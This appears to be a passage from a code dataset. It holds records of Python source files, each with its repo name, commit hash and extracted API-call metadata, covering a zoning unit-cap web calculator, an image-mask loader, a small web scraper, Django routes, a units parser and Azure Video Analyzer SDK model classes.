| [((8, 1, 23, 1), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(9, 4, 9, 28): '"""w, q, offset, expected"""', (10, 4, 22, 5): '[([1, 2, 3, 4, 5], 0.1, 0, 1), ([-1, 2, -3, 4, 5], 0.1, 0, 4), ([-3, -2, -1,\n 0, 1, 2, 3], 0.1, 0, np.inf), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, \n 9, 10], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], \n 0.15, 0, 3), ([-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, \n 0.31, -1.38], 0.1, 0, 1.93)]'}, {}), "('w, q, offset, expected', [([1, 2, 3, 4, 5], 0.1, 0,\n 1), ([-1, 2, -3, 4, 5], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3], 0.1, 0,\n np.inf), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4), (\n [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3), ([-1.52, \n 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38], 0.1, 0, 1.93)])", False, 'import pytest\n'), ((25, 8, 25, 19), 'numpy.array', 'np.array', ({(25, 17, 25, 18): 'w'}, {}), '(w)', True, 'import numpy as np\n'), ((26, 16, 26, 68), 'fanok.selection.adaptive_significance_threshold', 'adaptive_significance_threshold', (), '', False, 'from fanok.selection import adaptive_significance_threshold\n')] |
fintelia/habitationi | unitcap/unit_cap.py | 7dd15ecbab0ad63a70505920766de9c27294fb6e | #!/usr/bin/python
# Copyright 2019 Christopher Schmidt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from urlparse import urlparse, parse_qs
from jinja2 import Template
import sqlite3
import urllib
def get_caps(options):
far = {}
for i in ['A-1', 'A-2', 'B', 'SD-2']:
far[i] = 0.5
for i in ['C', 'SD-9', 'SD-10F', 'SD-10H']:
far[i] = 0.6
for i in ['C-1', 'BA-3', 'IB-2', 'O-1']:
far[i] = .75
for i in ['BA-1', 'SD-12']:
far[i] = 1.0
for i in ['C-1A', 'SD-5']:
far[i] = 1.25
for i in ['IA-1', 'IA', 'O-2A', 'SD-4A', 'SD-13']:
far[i] = 1.5
for i in ['C-2', 'C-2B', 'BA', 'BA-2', 'SD-8']:
far[i] = 1.75
for i in ['BC', 'O-2']:
far[i] = 2.0
for i in ['C-2A']:
far[i] = 2.50
for i in ['C-3', 'C-3A', 'C-3B', 'BB', 'BB-2', 'BC-1', 'IB-1', 'O-3', 'O-3A', 'SD-1', 'SD-6', 'SD-7']:
far[i] = 3.0
for i in ['IA-2', 'IB']:
far[i] = 4.0
far['BB-1'] = 3.25
far['SD-11'] = 1.7
far['SD-15'] = 3.5
lot_area = {
'A-1': 6000,
'A-2': 4500,
'C-1A': 1000,
'BC': 500,
'BC-1': 450,
'IA-1': 700,
'SD-8': 650,
'SD-14': 800,
}
for i in ['IB-2', 'BA-1']:
lot_area[i] = 1200
for i in ['B', 'SD-2', 'SD-3']:
lot_area[i] = 2500
for i in ['C', 'SD-10F', 'SD-10H', 'SD-9']:
lot_area[i] = 1800
for i in ['C-1', 'BA-3']:
lot_area[i] = 1500
for i in ['C-2', 'C-2B', 'O-2', 'BA', 'BA-2', 'SD-4', 'SD-4A', 'SD-5', 'SD-11', 'SD-13']:
lot_area[i] = 600
for i in ['C-2A', 'C-3', 'C-3A', 'C-3B', 'BB', 'BB-1', 'BB-2', 'SD-1', 'SD-6', 'SD-7']:
lot_area[i] = 300
for i in lot_area:
if options and 'lot_explicit' in options:
lot_area[i] = options['lot_explicit']
elif options and 'lot_factor' in options:
lot_area[i] = int(lot_area[i] / float(options['lot_factor']))
if 'no_lot' in options:
lot_area = {}
for i in far:
if options and 'far_explicit' in options:
far[i] = options['far_explicit']
elif options and 'far_factor' in options:
far[i] = far[i] * float(options['far_factor'])
if 'no_far' in options:
far = {}
return far, lot_area
def table(options):
far, lot_area = get_caps(options)
table = []
for i in ['A-1', 'A-2', 'B', 'C', 'C-1', 'C-1A', 'C-2', 'C-2A', 'C-2B', 'C-3', 'C-3A', 'C-3B']:
table.append("<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (i, far.get(i, ""), lot_area.get(i,"")))
return "\n".join(table)
def unit_cap(row, options=None):
if not options:
options = {}
far, lot_area = get_caps(options)
zone = row['zone']
if (not zone.startswith("C") and not zone in ("A-1", "A-2", "B")) or zone == "CRDD":
return -1
if zone in ['A-1', 'A-2'] and not 'no_a' in options:
return 1
#print row
area = float(row.get('gis_lot_size',0) or 0)
if zone in lot_area and area:
m = max(area/(lot_area[zone]), 1)
else:
m = 100000
max_building = area * far[zone] * 1
if max(int(max_building/800), 1) < m:
m = max(int(max_building/800), 1)
if zone == "B" and not 'no_b' in options:
m = min(m, 2)
return m
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
def compute_count(options = None):
conn = sqlite3.connect("prop.db")
if options == None:
options = {}
c = conn.cursor()
c.row_factory = dict_factory
m = 0
current = 0
for row in c.execute("SELECT * FROM lots"):
t = unit_cap(row, options=options)
if t == -1:
continue
m += int(t)
return m
def describe(options):
changes = []
if 'no_lot' in options:
changes.append("eliminate lot size/unit minimums")
elif 'lot_explicit' in options:
changes.append("set all lot size/unit minimums to %s" % options['lot_explicit'])
elif 'lot_factor' in options and options['lot_factor'] != 1.0:
changes.append('decrease lot size minimums by a factor of %s' % options['lot_factor'])
if 'no_a' in options:
changes.append('eliminate single family zoning in A-1 and A-2 zones')
if 'no_b' in options:
changes.append('eliminate two-family zoning limits in B zones')
if 'far_explicit' in options:
changes.append("set all FAR maximums to %s" % options['far_explicit'])
elif 'far_factor' in options and options['far_factor'] != 1.0:
changes.append('increase FAR maximums by a factor of %s' % options['far_factor'])
if len(changes):
return ", ".join(changes)
else:
return ""
def serve(options):
d = open("unit_template.html")
template = Template( d.read() )
unit_count = int(compute_count(options))
data = {}
data['changes'] = describe(options)
data['unit_count'] = unit_count
data['increase'] = unit_count-37453
data['table'] = table(options)
data['options'] = options
s = template.render(**data)
return s
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
# Send the html message
form = parse_qs(urlparse(self.path).query)
options = {}
for i in ['far_factor', 'lot_factor']:
if i in form:
options[i] = float(form[i][0])
else:
options[i] = 1.0
if 'far_explicit' in form and form['far_explicit']:
options['far_explicit'] = float(form['far_explicit'][0])
if 'lot_explicit' in form and form['lot_explicit']:
options['lot_explicit'] = int(form['lot_explicit'][0])
if 'lot' in form:
options['no_lot'] = True
if 'singlefamily' in form:
options['no_a'] = True
if 'twofamily' in form:
options['no_b'] = True
self.wfile.write(serve(options))
return
def run():
try:
#Create a web server and define the handler to manage the
#incoming request
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
#Wait forever for incoming htto requests
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
if __name__ == "__main__":
print run()
| [] |
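# Illustrative call (hypothetical parcel, not from the script above): unit_cap() keeps the
# smaller of the lot-area cap and the FAR cap for the parcel's zone.
sample_row = {"zone": "C-1", "gis_lot_size": 6000}
print(unit_cap(sample_row))  # C-1 at 6000 sq ft -> 4.0 (lot-area cap of 4 binds before the FAR cap of 5)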
AbhiK002/Matrix | matrix/__init__.py | 2d83f08877dccba9e4c710bd5fb65f613848d63f | from .main import Matrix
| [] |
jasstionzyf/Mask_RCNN | samples/cmk/test.py | 971a9dd9be1f9716e6f7c23b959bd57079cd93eb |
import os
import sys
import json
import datetime
import numpy as np
import glob
import skimage
from PIL import Image as pil_image
import cv2
import cv2
def locationToMask(locations=None,height=None,width=None):
mask = np.zeros([height, width, len(locations)],
dtype=np.uint8)
for index,location in enumerate(locations):
x1, y1, x2, y2 = location
mask[y1:y2+1,x1:x2+1,index]=1
print(mask[:,:,index])
return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32)
def load_cmk(dataset_dir, subset):
folder=os.path.join(dataset_dir, subset)
imagesPattern=folder+'/*.jpg'
for image_path in glob.glob(imagesPattern):
print(image_path)
img = cv2.imread(image_path)
height,width = img.shape[:2]
imageId=os.path.basename(image_path).replace('.jpg','')
print(imageId)
#
# self.add_image(
# "balloon",
# image_id=a['filename'], # use file name as a unique image id
# path=image_path,
# width=width, height=height,
# polygons=polygons)
locationsFile='%s/%s.txt' % (folder,imageId)
locations=[]
with open(locationsFile) as fp:
lines = fp.readlines()
for line in lines:
line = line.replace('\n', '')
if len(line.split(' ')) < 5:
break
classIndex, xcen, ycen, w, h = line.strip().split(' ')
xmin = max(float(xcen) - float(w) / 2, 0)
xmax = min(float(xcen) + float(w) / 2, 1)
ymin = max(float(ycen) - float(h) / 2, 0)
ymax = min(float(ycen) + float(h) / 2, 1)
xmin = int(width * xmin)
xmax = int(width * xmax)
ymin = int(height * ymin)
ymax = int(height * ymax)
location=(xmin,ymin,xmax,ymax)
locations.append(location)
print(locations)
dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/'
subset='val'
load_cmk(dataset_dir=dataset_dir,subset=subset)
locations=[(2,3,5,7),(8,8,9,9)]
height=10
width=10
# mask,classIds=locationToMask(locations=locations,height=height,width=width)
# print(mask)
# print(classIds)
| [((51, 11, 51, 44), 'os.path.join', 'os.path.join', ({(51, 24, 51, 35): 'dataset_dir', (51, 37, 51, 43): 'subset'}, {}), '(dataset_dir, subset)', False, 'import os\n'), ((54, 22, 54, 46), 'glob.glob', 'glob.glob', ({(54, 32, 54, 45): 'imagesPattern'}, {}), '(imagesPattern)', False, 'import glob\n'), ((37, 33, 37, 74), 'numpy.ones', 'np.ones', (), '', True, 'import numpy as np\n'), ((57, 14, 57, 36), 'cv2.imread', 'cv2.imread', ({(57, 25, 57, 35): 'image_path'}, {}), '(image_path)', False, 'import cv2\n'), ((59, 16, 59, 44), 'os.path.basename', 'os.path.basename', ({(59, 33, 59, 43): 'image_path'}, {}), '(image_path)', False, 'import os\n')] |
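# Illustrative check of locationToMask(), mirroring the commented-out example at the end of
# the record above: two (x1, y1, x2, y2) boxes rasterized onto a 10x10 canvas.
mask, class_ids = locationToMask(locations=[(2, 3, 5, 7), (8, 8, 9, 9)], height=10, width=10)
print(mask.shape)   # (10, 10, 2) -- one boolean channel per box
print(class_ids)    # [1 1] -- every box is assigned class id 1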
ZhongXinWang/python | myBeautifulSoup.py | 4cf3ecdc9d9e811e777c6d8408a8319097cfdec3 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import requests
from bs4 import BeautifulSoup
print(dir(BeautifulSoup))
url = 'http://www.baidu.com';
with requests.get(url) as r:
r.encoding='utf-8'
soup = BeautifulSoup(r.text)
#格式化
pret = soup.prettify();
u = soup.select('#u1 a')
for i in u:
print("名称:%s,地址:%s" % (i.getText(),i.get('href'))) | [((8, 5, 8, 22), 'requests.get', 'requests.get', ({(8, 18, 8, 21): 'url'}, {}), '(url)', False, 'import requests\n'), ((10, 8, 10, 29), 'bs4.BeautifulSoup', 'BeautifulSoup', ({(10, 22, 10, 28): 'r.text'}, {}), '(r.text)', False, 'from bs4 import BeautifulSoup\n')] |
adityakekare/NewsAPIDjango | blogsNewsModule/urls.py | 47ff0c69e3d48c10a257c8221916ccd2fdaf9abb | from django.urls import path, include
from . import views
urlpatterns = [
path("", views.newsView, name="home"),
path("createBlog", views.CreateBlogView.as_view(), name="createBlog"),
path("myBlogs", views.PostListView.as_view(), name="myBlogs"),
path("single/<int:pk>", views.PostDetailView.as_view(), name="single"),
path("subscribe", views.subscribeView,name="subscribe"),
path("about", views.aboutView, name="about"),
path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"),
path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"),
path("like/<int:pk>", views.LikeView, name="like_post"),
# API urls for superuser
path("api/create/", views.APICreateView.as_view()),
path("api/posts/", views.APIListView.as_view()),
path("api/posts/<int:pk>", views.APIDetailView.as_view()),
] | [((5, 4, 5, 41), 'django.urls.path', 'path', (), '', False, 'from django.urls import path, include\n'), ((9, 4, 9, 59), 'django.urls.path', 'path', (), '', False, 'from django.urls import path, include\n'), ((10, 4, 10, 48), 'django.urls.path', 'path', (), '', False, 'from django.urls import path, include\n'), ((13, 4, 13, 59), 'django.urls.path', 'path', (), '', False, 'from django.urls import path, include\n')] |
MatthewZheng/UnitsPlease | unitClass.py | 5911267b5a0a78dd4d833c6be46e89caaf98c200 | #!/usr/bin/python
_author_ = "Matthew Zheng"
_purpose_ = "Sets up the unit class"
class Unit:
'''This is a class of lists'''
def __init__(self):
self.baseUnits = ["m", "kg", "A", "s", "K", "mol", "cd", "sr", "rad"]
self.derivedUnits = ["Hz", "N", "Pa", "J", "W", "C", "V", "F", "ohm", "S", "Wb", "T", "H", "°C", "lm", "lx", "Bq", "Gy", "Sv", "kat"]
def baseCheck(self, userList):
'''Converts elements in str list to base units'''
converted = []
for i in (userList):
isSquared = False
unitPreIndex = ""
#checks if it has a carat in the expression
for ind, j in enumerate(list(i)):
if j == "^":
isSquared = True
unitPreIndex = ''.join(list(i)[:ind])
break
#converts non-unary unit to base unit and checks for squared variables
while(i not in (self.baseUnits or self.derivedUnits) and len(list(i)) != 1 and unitPreIndex not in (self.baseUnits or self.derivedUnits) and len(unitPreIndex) != 1):
orgNameList = list(i)
#identify prefix removed
self.idPrefix = orgNameList.pop(0)
i = ''.join(orgNameList)
print("The program removed the prefix %s and converted your unit to it's base unit: %s." % (self.idPrefix, i))
#checks if it is a special unit
if(i not in (self.baseUnits and self.derivedUnits)):
#append in case for special units
break
else:
#append in case for base unit
break
#Appends base unit
if(i in (self.baseUnits or self.derivedUnits) and isSquared == False):
converted.append(i)
elif(isSquared == True):
toAppend = []
numReps = []
#run once to get number of times the unit is squared
for index, val in enumerate(list(i)):
if val == "^":
numStart = index+1
numReps.append(''.join(list(i)[numStart:]))
toAppend.append(''.join(list(i)[:index]))
break
#convert numReps into an int
intReps = int(''.join(numReps))
#append number of units specified by the carat
for l in range (intReps):
if(''.join(toAppend) not in (self.baseUnits or self.derivedUnits)):
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % ''.join(toAppend))
converted.append(''.join(toAppend))
#Exception for special units
else:
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % i)
converted.append(i)
return(converted)
| [] |
MathAdventurer/Data_Mining | week4/string_format.py | b0a06b5f7c13a3762a07eb84518aa4ee56896516 | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 22:23:07 2020
@author: Neal LONG
Try to construct URL with string.format
"""
base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}"
stock = "000002"
api_type = 'cp'
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
stock = "00002"
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
print('='*40)
print('{:>6}'.format('236'))
print('{:>06}'.format('236'))
print("Every {} should know the use of {}-{} programming and {}"
.format("programmer", "Open", "Source", "Operating Systems"))
print("Every {3} should know the use of {2}-{1} programming and {0}"
.format("programmer", "Open", "Source", "Operating Systems")) | [] |
Wonders11/conan | conans/server/server_launcher.py | 28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8 | from conans.server.launcher import ServerLauncher
from conans.util.env_reader import get_env
launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME"))
app = launcher.server.root_app
def main(*args):
launcher.launch()
if __name__ == "__main__":
main()
| [((5, 37, 5, 65), 'conans.util.env_reader.get_env', 'get_env', ({(5, 45, 5, 64): '"""CONAN_SERVER_HOME"""'}, {}), "('CONAN_SERVER_HOME')", False, 'from conans.util.env_reader import get_env\n')] |
praveenkuttappan/azure-sdk-for-python | sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py | 4b79413667b7539750a6c7dde15737013a3d4bd5 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class Resource(msrest.serialization.Model):
"""Common fields that are returned in the response for all Azure Resource Manager resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.system_data = None
class ProxyResource(Resource):
"""The resource model definition for a Azure Resource Manager proxy resource. It will not have tags and a location.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(ProxyResource, self).__init__(**kwargs)
class AccessPolicyEntity(ProxyResource):
"""Access policies help define the authentication rules, and control access to specific video resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param role: Defines the access level granted by this policy. Possible values include:
"Reader".
:type role: str or ~video_analyzer.models.AccessPolicyRole
:param authentication: Authentication method to be used when validating client API access.
:type authentication: ~video_analyzer.models.AuthenticationBase
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'role': {'key': 'properties.role', 'type': 'str'},
'authentication': {'key': 'properties.authentication', 'type': 'AuthenticationBase'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntity, self).__init__(**kwargs)
self.role = kwargs.get('role', None)
self.authentication = kwargs.get('authentication', None)
class AccessPolicyEntityCollection(msrest.serialization.Model):
"""A collection of AccessPolicyEntity items.
:param value: A collection of AccessPolicyEntity items.
:type value: list[~video_analyzer.models.AccessPolicyEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[AccessPolicyEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class AccountEncryption(msrest.serialization.Model):
"""Defines how the Video Analyzer account is (optionally) encrypted.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type: Required. The type of key used to encrypt the Account Key. Possible values
include: "SystemKey", "CustomerKey".
:type type: str or ~video_analyzer.models.AccountEncryptionKeyType
:param key_vault_properties: The properties of the key used to encrypt the account.
:type key_vault_properties: ~video_analyzer.models.KeyVaultProperties
:param identity: The Key Vault identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the Key Vault mapping.
:vartype status: str
"""
_validation = {
'type': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'key_vault_properties': {'key': 'keyVaultProperties', 'type': 'KeyVaultProperties'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccountEncryption, self).__init__(**kwargs)
self.type = kwargs['type']
self.key_vault_properties = kwargs.get('key_vault_properties', None)
self.identity = kwargs.get('identity', None)
self.status = None
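# Illustrative sketch (not part of the generated models): 'type' is required, so the constructor
# reads kwargs['type'] directly and raises KeyError when it is missing, whereas optional
# properties fall back to None via kwargs.get().
def _example_account_encryption():
    encryption = AccountEncryption(type='SystemKey')  # 'CustomerKey' is also allowed
    try:
        AccountEncryption()  # missing required 'type'
    except KeyError:
        pass
    return encryption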
class AudioEncoderBase(msrest.serialization.Model):
"""Base type for all audio encoder presets, which define the recipe or instructions on how audio should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AudioEncoderAac.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.AudioEncoderAac': 'AudioEncoderAac'}
}
def __init__(
self,
**kwargs
):
super(AudioEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
class AudioEncoderAac(AudioEncoderBase):
"""A custom preset for encoding audio with the AAC codec.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AudioEncoderAac, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.AudioEncoderAac' # type: str
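# Illustrative sketch (not part of the generated models): the '@type' discriminator plus
# _subtype_map drive polymorphic handling. Assuming msrest's Model.deserialize() resolves the
# discriminator against the subtype map, a payload tagged with the AAC type should come back as
# an AudioEncoderAac instance rather than the AudioEncoderBase base class.
def _example_audio_encoder_roundtrip():
    payload = {'@type': '#Microsoft.VideoAnalyzer.AudioEncoderAac', 'bitrateKbps': '128'}
    encoder = AudioEncoderBase.deserialize(payload)
    assert isinstance(encoder, AudioEncoderAac)
    assert encoder.bitrate_kbps == '128'
    return encoder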
class AuthenticationBase(msrest.serialization.Model):
"""Base class for access policies authentication methods.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: JwtAuthentication.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.JwtAuthentication': 'JwtAuthentication'}
}
def __init__(
self,
**kwargs
):
super(AuthenticationBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CertificateSource(msrest.serialization.Model):
"""Base class for certificate sources.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: PemCertificateList.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.PemCertificateList': 'PemCertificateList'}
}
def __init__(
self,
**kwargs
):
super(CertificateSource, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CheckNameAvailabilityRequest(msrest.serialization.Model):
"""The check availability request body.
:param name: The name of the resource for which availability needs to be checked.
:type name: str
:param type: The resource type.
:type type: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityRequest, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.type = kwargs.get('type', None)
class CheckNameAvailabilityResponse(msrest.serialization.Model):
"""The check availability result.
:param name_available: Indicates if the resource name is available.
:type name_available: bool
:param reason: The reason why the given name is not available. Possible values include:
"Invalid", "AlreadyExists".
:type reason: str or ~video_analyzer.models.CheckNameAvailabilityReason
:param message: Detailed reason why the given name is available.
:type message: str
"""
_attribute_map = {
'name_available': {'key': 'nameAvailable', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityResponse, self).__init__(**kwargs)
self.name_available = kwargs.get('name_available', None)
self.reason = kwargs.get('reason', None)
self.message = kwargs.get('message', None)
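# Illustrative sketch (not part of the generated models): a name-availability check sends a
# CheckNameAvailabilityRequest and reads back a CheckNameAvailabilityResponse; the operation
# that performs the call lives in the client, not in these models. The name and resource type
# strings below are hypothetical.
def _example_check_name_request():
    request = CheckNameAvailabilityRequest(
        name='contoso-video-account',  # hypothetical account name
        type='Microsoft.Media/videoAnalyzers',  # hypothetical resource type string
    )
    # Expected to yield roughly {'name': ..., 'type': ...} with camelCase REST keys.
    return request.serialize()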
class CredentialsBase(msrest.serialization.Model):
"""Base class for credential objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: UsernamePasswordCredentials.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.UsernamePasswordCredentials': 'UsernamePasswordCredentials'}
}
def __init__(
self,
**kwargs
):
super(CredentialsBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TokenKey(msrest.serialization.Model):
"""Key properties for JWT token validation.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EccTokenKey, RsaTokenKey.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EccTokenKey': 'EccTokenKey', '#Microsoft.VideoAnalyzer.RsaTokenKey': 'RsaTokenKey'}
}
def __init__(
self,
**kwargs
):
super(TokenKey, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.kid = kwargs['kid']
class EccTokenKey(TokenKey):
"""Required validation properties for tokens generated with Elliptical Curve algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. Elliptical curve algorithm to be used: ES256, ES384 or ES512. Possible
values include: "ES256", "ES384", "ES512".
:type alg: str or ~video_analyzer.models.AccessPolicyEccAlgo
:param x: Required. X coordinate.
:type x: str
:param y: Required. Y coordinate.
:type y: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'x': {'required': True},
'y': {'required': True},
